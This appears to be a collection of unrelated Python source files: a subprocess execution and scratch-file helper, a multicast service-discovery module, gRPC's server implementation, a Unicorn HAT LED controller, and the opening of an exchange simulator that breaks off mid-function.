for r in iter(partial(buffer.read, 1024), b""):
storage.write(r)
if pass_output_forward:
sysio.write(r.decode())
stdout_reader = Thread(
target=read_from_buffer, args=(ret["proc"].stdout, stdout, sys.stdout)
)
stdout_reader.start()
stderr_reader = Thread(
target=read_from_buffer, args=(ret["proc"].stderr, stderr, sys.stderr)
)
stderr_reader.start()
# Yield control back to the main thread
try:
yield ret
except Exception:
raise
finally:
# Executes on an exception or once the context manager closes
try:
terminate_process(ret["proc"])
finally:
# Wait for the reader threads to finish
stdout_reader.join()
stderr_reader.join()
# Retrieve the standard output for the process
ret["stdout"] = stdout.getvalue().decode()
ret["stderr"] = stderr.getvalue().decode()
@contextmanager
def disk_files(
infiles: Dict[str, Union[str, bytes]],
outfiles: Dict[str, None],
*,
cwd: Optional[str] = None,
as_binary: Optional[List[str]] = None,
outfiles_track: Optional[List[str]] = None,
) -> Dict[str, Union[str, bytes, Path]]:
"""Write and collect files.
Parameters
----------
infiles : Dict[str] = str
Input file names (names, not full paths) and contents.
to be written in scratch dir. May be {}.
outfiles : Dict[str] = None
Output file names to be collected after execution into
values. May be {}.
cwd : str, optional
Directory to which to write and read files.
as_binary : List[str] = None
Keys in `infiles` (`outfiles`) to be written (read) as bytes, not decoded.
outfiles_track: List[str], optional
Keys of `outfiles` to keep track of (i.e. file contents not loaded in memory).
For specified filename in `outfiles_track`, the file path instead of contents
is stored in `outfiles`.
Yields
------
Dict[str, Union[str, bytes, Path]]
outfiles with RHS filled in.
"""
if cwd is None:
lwd = Path.cwd()
else:
lwd = Path(cwd)
if as_binary is None:
as_binary = []
assert set(as_binary) <= (set(infiles) | set(outfiles))
outfiles_track = outfiles_track or []
try:
for fl, content in infiles.items():
omode = "wb" if fl in as_binary else "w"
filename = lwd / fl
with open(filename, omode) as fp:
fp.write(content)
yield outfiles
finally:
outfiles_track = [
fpath.name if "*" in track else track
for track in outfiles_track
for fpath in lwd.glob(track)
]
for fl in outfiles.keys():
filename = lwd / fl
omode = "rb" if fl in as_binary else "r"
try:
with open(filename, omode) as fp:
if fl not in outfiles_track:
outfiles[fl] = fp.read()
else:
outfiles[fl] = filename
except (OSError, FileNotFoundError):
if "*" in fl:
gfls = {}
for gfl in lwd.glob(fl):
with open(gfl, omode) as fp:
if gfl.name not in outfiles_track:
gfls[gfl.name] = fp.read()
else:
gfls[gfl.name] = gfl
if not gfls:
gfls = None
outfiles[fl] = gfls
else:
outfiles[fl] = None
def execute(
command: List[str],
infiles: Optional[Dict[str, str]] = None,
outfiles: Optional[List[str]] = None,
*,
outfiles_track: Optional[List[str]] = None,
as_binary: Optional[List[str]] = None,
scratch_name: Optional[str] = None,
scratch_directory: Optional[str] = None,
scratch_suffix: Optional[str] = None,
scratch_messy: bool = False,
scratch_exist_ok: bool = False,
blocking_files: Optional[List[str]] = None,
timeout: Optional[int] = None,
interupt_after: Optional[int] = None,
environment: Optional[Dict[str, str]] = None,
shell: Optional[bool] = False,
exit_code: Optional[int] = 0,
) -> Tuple[bool, Dict[str, Any]]:
"""
Runs a process in the background until complete.
Returns True if exit code <= exit_code (default 0)
Parameters
----------
command : list of str
infiles : Dict[str] = str
Input file names (names, not full paths) and contents.
to be written in scratch dir. May be {}.
outfiles : List[str] = None
Output file names to be collected after execution into
values. May be {}.
outfiles_track: List[str], optional
Keys of `outfiles` to keep track of without loading their contents in memory.
For specified filename in `outfiles_track`, the file path instead of contents
is stored in `outfiles`. To ensure tracked files are not deleted after execution,
you must set `scratch_messy=True`.
as_binary : List[str] = None
Keys of `infiles` or `outfiles` to be treated as bytes.
scratch_name : str, optional
Passed to temporary_directory
scratch_directory : str, optional
Passed to temporary_directory
scratch_suffix : str, optional
Passed to temporary_directory
scratch_messy : bool, optional
Passed to temporary_directory
scratch_exist_ok : bool, optional
Passed to temporary_directory
blocking_files : list, optional
Files which should stop execution if present beforehand.
timeout : int, optional
Stop the process after n seconds.
interupt_after : int, optional
Interupt the process (not hard kill) after n seconds.
environment : dict, optional
The environment to run in
shell : bool, optional
Run command through the shell.
exit_code: int, optional
The exit code above which the process is considered failure.
Raises
------
FileExistsError
If any file in `blocking` is present
Examples
--------
# execute multiple commands in same dir
>>> success, dexe = qcng.util.execute(['command_1'], infiles, [], scratch_messy=True)
>>> success, dexe = qcng.util.execute(['command_2'], {}, outfiles, scratch_messy=False, scratch_name=Path(dexe['scratch_directory']).name, scratch_exist_ok=True)
"""
# Format inputs
if infiles is None:
infiles = {}
if outfiles is None:
outfiles = []
outfiles = {k: None for k in outfiles}
# Check for blocking files
if blocking_files is not None:
for fl in blocking_files:
if os.path.isfile(fl):
raise FileExistsError(
"Existing file can interfere with execute operation.", fl
)
# Format popen
popen_kwargs = {}
if environment is not None:
popen_kwargs["env"] = {k: v for k, v in environment.items() if v is not None}
# Execute
with temporary_directory(
child=scratch_name,
parent=scratch_directory,
messy=scratch_messy,
exist_ok=scratch_exist_ok,
suffix=scratch_suffix,
) as scrdir:
popen_kwargs["cwd"] = scrdir
popen_kwargs["shell"] = shell
with disk_files(
infiles,
outfiles,
cwd=scrdir,
as_binary=as_binary,
outfiles_track=outfiles_track,
) as extrafiles:
with popen(command, popen_kwargs=popen_kwargs) as proc:
# Wait for the subprocess to complete or the timeout to expire
if interupt_after is None:
proc["proc"].wait(timeout=timeout)
else:
time.sleep(interupt_after)
terminate_process(proc["proc"])
retcode = proc["proc"].poll()
proc["outfiles"] = extrafiles
proc["scratch_directory"] = scrdir
return retcode <= exit_code, proc
|
discovery.py | #!/usr/bin/python
import socket
import struct
import threading
import logging
known_services = {}
callbacks = []
cont = False
def init():
logging.debug("initiating discovery")
global cont, thread
cont = True
thread = threading.Thread(target=run)
thread.start()
def run():
global cont
cont = True
MCAST_GRP = '239.255.255.255'
MCAST_PORT = 10001
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', MCAST_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(0.1)
while cont:
try:
msg = sock.recv(10240).split('\n')
#logging.debug("Message: " + '||'.join(msg))
if (len(msg) > 0):
if (msg[0] == "notify"): handle_notify(msg)
elif (msg[0] == "hello"): handle_hello(msg)
elif (msg[0] == "bye"): handle_bye(msg)
elif (msg[0] == "search"): handle_search()
else: logging.warning("Unknown message: " + '||'.join(msg))
except:
pass
def store_service(service, endpoint):
logging.debug("Storing service: " + service + " (" + endpoint + ")")
global known_services, callbacks
known_services[service] = endpoint
for c in callbacks:
c(service, True)
def erase_service( service):
logging.debug("Erasing service: " + service)
global known_services, callbacks
del known_services[service]
for c in callbacks:
c(service, False)
def check_service(service, endpoint):
global known_services
if service not in known_services:
store_service(service, endpoint)
elif known_services[service] != endpoint:
erase_service(service)
store_service(service, endpoint)
def handle_notify(msg):
if (len(msg) >= 3):
check_service(msg[1], msg[2])
def handle_bye(msg):
if msg[1] in known_services:
erase_service(msg[1])
def handle_hello(msg):
if (len(msg) >= 3):
check_service(msg[1], msg[2])
def handle_search():
MCAST_GRP = '239.255.255.255'
MCAST_PORT = 10001
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
for s, e in known_services.iteritems():
msg = "notify\n" + s + "\n" + e
sock.sendto(msg, (MCAST_GRP, MCAST_PORT))
def exit():
global cont, thread
cont = False
thread.join()
logging.debug("Discovery exit")
def register(callback):
callbacks.append(callback)
for s in known_services.copy():
callback(s, True)
def get(service):
if service in known_services:
return known_services[service]
else:
raise RuntimeError("Service not found " + service)
|
_server.py | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[
0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(self._rpc_event.request_call_details.deadline - time.time(),
0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(state, rpc_event.operation_call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.stream_unary, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),)
rpc_state = _RPCState()
rpc_event.operation_call.start_server_batch(operations,
lambda ignored_event: (
rpc_state,
(),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler,
thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler,
thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(event, state.generic_handlers,
state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers, options):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state,
_common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
state.py | import multiprocessing
import importlib
import sys
import os
class State:
''' Handles the Unicorn HAT state'''
def __init__(self, is_hd=True):
self._process = None
self.set_model(is_hd)
def set_model(self, is_hd):
self.is_hd = is_hd
if self.is_hd is True:
import unicornhathd
import app.programs.hd
self._unicornhat = unicornhathd
self._app_programs = app.programs.hd.list
else:
import unicornhat
import app.programs.original
self._unicornhat = unicornhat
self._app_programs = app.programs.original.list
def start_program(self, name, params={}):
program = self._get_program(name)
self.stop_program()
self._set_rotation(params)
self._set_brightness(params)
self._start_process(program, params)
def stop_program(self):
if self._process is not None:
self._process.terminate()
self._unicornhat.show()
def _get_program(self, name):
try:
return self._app_programs[name]
except KeyError:
raise ProgramNotFound(name)
def _set_brightness(self, params):
if params.get("brightness") is not None:
brightness = float(params["brightness"])
if 0 <= brightness <= 1:
self._unicornhat.brightness(brightness)
else:
raise ValueError("Brightness must be between 0.0 and 1.0")
def _set_rotation(self, params):
if params.get("rotation") is not None:
rotation = int(params["rotation"])
if rotation in [0, 90, 180, 270]:
self._unicornhat.rotation(rotation)
else:
raise ValueError("Rotation must be 0, 90, 180 or 270 degrees")
def _start_process(self, program, params):
def run_program(self):
importlib.import_module(program.location).run(params)
self._process = multiprocessing.Process(target=run_program, args=(params,))
self._process.start()
state = State()
class ProgramNotFound(Exception):
pass
|
Exchange.py | """
The Ouch Team
Exchange Integration
Integration of all required classes together into a working implementation. Will be changed
as new components are added. This is mostly for knowing what we have to implement in future modules.
"""
import threading
import time
from src.OrderBook import OrderBook
from src.receiver import Receiver
from src.util import Util
from src.console import Console
class Exchange():
PRICE_MAX = 214748364.6
QUANTITY_MAX = 2147483647
def __init__(self, debug="default"):
"""
An instance of this class should be initialised before trying to establish a connection using client.py.
All program components are integrated together with this class, connecting the
receiver, orderbook, and output components. When this program is called, it will output
the Orderbook to the console once every second.
"""
# Exchange state variables
self.open = True
# Connection receiver
self.connection_manager = Receiver()
self.msg_queue = self.connection_manager.get_queue()
# Orderbook
self.orderbook_lock = threading.Lock()
self.orderbook = OrderBook()
# Outputting orderbook once per second, change to silent-mode later.
self.debug = debug
self.print_dict = threading.Event()
self.printer = threading.Thread(name="printer", target=lambda: self._print_orderbook_thread(), daemon=True)
self.printer.start()
self.operation_thread = threading.Thread(name="operate", target=lambda: self._operate(), daemon=True)
self.operation_thread.start()
def open_exchange(self):
"""Open the exchange and allow clients to place orders."""
self.open = True
def close_exchange(self):
"""Close the exchange and prevent clients from place orders."""
self.open = False
self.connection_manager.terminate()
def _operate(self):
"""
Exchange's main function. Continuously retrieves messages from the reveiver's
Queue, parses it into dictionary format, validates the order format, passes it to the
OrderBook, then sends any OrderBook response back to the receiver.
A thread of this function is automatically created upon initialisation.
"""
while True:
# Wait until queue has messages, then retrieve it.
# The message is a dictionary with {"client_id": int, "header": bytes, "body": bytes}
msg = self.msg_queue.get()
# A new client has established a connection.
if msg["type"] == "C":
# Acknowledge the connection by returning a server event message.
if not self.open:
outbound = ["S", Util.get_server_time(), "S"]
else:
outbound = ["S", Util.get_server_time(), "E"]
self.connection_manager.send_message(msg["id"], Util.package(outbound))
else:
